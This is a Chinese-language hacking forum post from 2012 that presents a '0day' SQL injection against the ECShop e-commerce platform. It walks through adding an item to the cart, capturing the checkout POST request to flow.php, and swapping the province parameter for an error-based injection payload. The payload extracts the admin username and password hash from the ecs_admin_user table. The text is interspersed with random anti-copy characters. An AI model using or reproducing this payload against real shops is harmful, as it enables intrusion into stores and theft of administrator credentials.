找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2302|回复: 0
打印 上一主题 下一主题

ECShop全版本SQL注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:19:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
感谢欠杀的黑盒
" Z& D! w  j+ j5 ^+ f6 c
" q! q! h. E0 y  V- |2 A 2 o* L% Z4 ^" B8 c
把任意商品加入购物车在填写配送地址那一页,有地区选择) m8 o/ K( v5 b+ z  k" U0 C7 |

) [! {1 u1 x: z: rflow.php?step=consignee&direct_shopping=13 r; N' Q/ e4 Q. V5 O. d) W# `
比如省选择安徽$ H; h8 N. R& `7 p1 I
- B: I/ `$ `, r% X1 b
其中POST数据如下) U2 v. Y7 y( t' v; Z+ c  w+ i  v
" I  E! \. D8 m' f2 O% n" Z! U
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
6 h1 m9 E& J! S' G( C( V# n改成
5 p+ @, K" l) Q+ E1 W1 f
  `% B) J' y/ _8 [province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #3 l5 b# P0 p, h. i0 J, K" E
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..; z! u' @5 T' @- D- H6 I

: h' D" j2 f5 o# {9 _先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包9 E: w8 }" M$ t. S

2 @; l: `6 |( V9 C$ ^! j就会回显错误页面了。。。。! K+ Q. T, ^7 S+ |, u

" D! k; x3 j+ C5 T6 u/ j8 p8 w我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的0 i' D3 u  @: N- d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表